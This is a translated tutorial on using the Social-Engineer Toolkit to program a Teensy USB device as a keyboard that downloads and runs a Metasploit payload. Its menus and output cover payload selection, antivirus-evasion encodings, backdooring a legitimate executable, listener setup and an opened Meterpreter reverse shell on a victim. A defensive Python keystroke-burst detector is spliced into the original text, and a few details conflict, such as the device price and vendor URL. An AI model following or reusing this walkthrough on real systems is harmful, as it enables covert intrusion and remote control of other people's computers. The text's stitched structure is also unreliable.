Teensy USB HID Attack

From www.metasploit-es.com.ar

Teensy USB HID Attack Vector

The Teensy USB HID Attack Vector is a remarkable combination of custom hardware and bypassing restrictions through keyboard emulation. Traditionally, when you insert a DVD/CD or a USB stick with autorun disabled, your autorun.inf is not invoked and you cannot execute your code automatically. With the Teensy HID-based device you can emulate a keyboard and a mouse. When you insert the device it is detected as a keyboard, and with the microprocessor and the onboard flash storage you can send a set of keystrokes to the machine very rapidly and compromise it completely. You can order a Teensy device for roughly 17 US dollars from http://www.prjc.com. Shortly after the talk by David Kennedy, Josh Kelley and Adrian Crenshaw on Teensy devices, a PS3 hack appeared that used Teensy devices, and at the time of writing this tutorial they are sold out. Let's configure our Teensy device to perform a WSCRIPT download of a Metasploit payload. What will happen here is that a small wscript file is written, which downloads an executable and runs it. That executable will be our Metasploit payload, and everything is handled from the Social-Engineer Toolkit.
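The paragraph above rests on one observable property of the attack: the device types far faster, and with a far more uniform cadence, than a person at a keyboard. The following Python is an added example written for this page from the defender's side; it is not code from SET, Metasploit or the original article. It scans a stream of keystroke events from one input device and flags runs whose timing looks machine-generated, which is the signal a host agent or keystroke-injection monitor would alert on (and a cue to check whether a new keyboard-class USB device was enumerated just before the burst). The event list, the thresholds (WINDOW, MAX_MEAN_MS, MAX_SPREAD_MS) and the Burst record are all assumptions constructed for the illustration; a real deployment would feed it events from the OS input layer and tune the thresholds against its own users.

```python
"""Keystroke-injection burst detector (added example; not part of SET)."""
from dataclasses import dataclass
from typing import List, Tuple

# Thresholds are illustrative assumptions, not measured values: a fast human
# typist rarely sustains a mean gap under ~30 ms across 20 consecutive keys,
# and human gaps vary by tens of ms, whereas a programmed HID device emits
# keys at a fixed, near-zero-jitter rate.
WINDOW = 20            # consecutive keystrokes examined together
MAX_MEAN_MS = 30.0     # mean inter-key gap below this is suspicious
MAX_SPREAD_MS = 10.0   # (max gap - min gap) below this is unnaturally uniform


@dataclass
class Burst:
    start_ms: int       # timestamp of the first key in the burst
    end_ms: int         # timestamp of the last key in the burst
    keys: int           # number of keystrokes in the burst
    mean_gap_ms: float  # mean inter-key gap of the first WINDOW keys


def find_bursts(events: List[Tuple[int, str]]) -> List[Burst]:
    """events: (timestamp_ms, key) pairs from one device, sorted by time.

    Returns non-overlapping bursts whose cadence looks machine-generated.
    """
    bursts: List[Burst] = []
    i = 0
    while i + WINDOW <= len(events):
        window = events[i:i + WINDOW]
        gaps = [b[0] - a[0] for a, b in zip(window, window[1:])]
        mean = sum(gaps) / len(gaps)
        spread = max(gaps) - min(gaps)
        if mean < MAX_MEAN_MS and spread < MAX_SPREAD_MS:
            # Extend the burst while the machine-like cadence continues.
            j = i + WINDOW
            while j < len(events) and events[j][0] - events[j - 1][0] < MAX_MEAN_MS:
                j += 1
            bursts.append(Burst(window[0][0], events[j - 1][0], j - i, mean))
            i = j          # resume after the burst so bursts never overlap
        else:
            i += 1
    return bursts


def constructed_sample() -> List[Tuple[int, str]]:
    """Constructed data, not a real capture: a person types a sentence, pauses,
    a HID device injects 45 keys at a fixed 8 ms cadence, the person resumes."""
    events: List[Tuple[int, str]] = []
    t = 0
    human_gaps = [120, 95, 210, 140, 80, 175, 260, 110, 150, 90, 200, 130]
    for n, ch in enumerate("hello world, this is me"):   # 23 human keys
        t += human_gaps[n % len(human_gaps)]
        events.append((t, ch))
    t += 3000                                             # device plugged in
    for n in range(45):                                   # injected keys
        t += 8
        events.append((t, f"inj{n}"))                     # placeholder key names
    t += 500                                              # person resumes
    for n, ch in enumerate("back to work"):               # 12 human keys
        t += human_gaps[n % len(human_gaps)]
        events.append((t, ch))
    return events


if __name__ == "__main__":
    for b in find_bursts(constructed_sample()):
        print(f"suspicious burst: {b.keys} keys from t={b.start_ms}ms "
              f"to t={b.end_ms}ms, mean gap {b.mean_gap_ms:.1f} ms")
```

The detector deliberately requires both a low mean gap and a low spread: a person mashing a key repeat can produce a low mean, but only scripted input produces a near-constant interval over twenty keys. Pairing a burst alert with the device-enumeration log (a new keyboard-class device appearing seconds earlier) gives a far stronger signal than either event alone, and USB device allow-listing remains the preventive control that the keystroke-timing check complements rather than replaces.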

Select from the menu:

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7.  SMS Spoofing Attack Vector
8.  Third Party Modules
9.  Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit

Enter your choice: 6

Welcome to the Teensy HID Attack Vector.

Special thanks to: IronGeek and WinFang

The Teensy HID Attack Vector utilizes the teensy USB device to
program the device to act as a keyboard. Teensy's have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.

You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.

This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.

For more information on specifications and good tutorials visit:

http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html

Select a payload to create the pde file to import into Arduino:

1. Powershell HTTP GET MSF Payload
2. WSCRIPT HTTP GET MSF Payload
3. Powershell based Reverse Shell
4. Return to the main menu.

Enter your choice: 2
Do you want to create a payload and listener yes or no: yes
What payload do you want to generate:

Name:                                      Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable              Specify a path for your own executable

Enter choice (hit enter for default):

Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.


[*] PDE file created. You can get it under 'reports/teensy.pde'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
Press enter to continue.

[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

Now that we have everything set up, SET will export a file called teensy.pde to the reports/ directory. Copy that reports directory to wherever you have Arduino installed. For this attack, follow the PRJC instructions on how to upload your code to the Teensy board; it is relatively simple: you just need to install the Teensy Loader and the libraries. Once that is done, you will have an IDE interface called Arduino. One of the MOST important aspects of this is making sure you set your board to Teensy USB Keyboard/Mouse.

[Image: SET 11.png]


Once you have that selected, drag your pde file into the Arduino interface. Arduino/Teensy supports Linux, OSX and Windows. Insert your USB device into the PC and upload your code. This programs your device with the code generated by SET. Below is a sample of the upload and the code.

[Image: SET 12.png]


Once the USB device is inserted into the victim machine our code is executed, and when it finishes you should be presented with a meterpreter shell.

  [*] Sending stage (748544 bytes) to 172.16.32.131
  [*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:52:32 -0400 2010
  [*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f'
  [*] Current server process: java.exe (824)
  [*] Spawning a notepad.exe host process...
  [*] Migrating into process ID 3044
  [*] New server process: notepad.exe (3044)
  msf exploit(ms09_002_memory_corruption) >



© Offensive Security 2009

Original from www.offensive-security.com
Translated by cbk999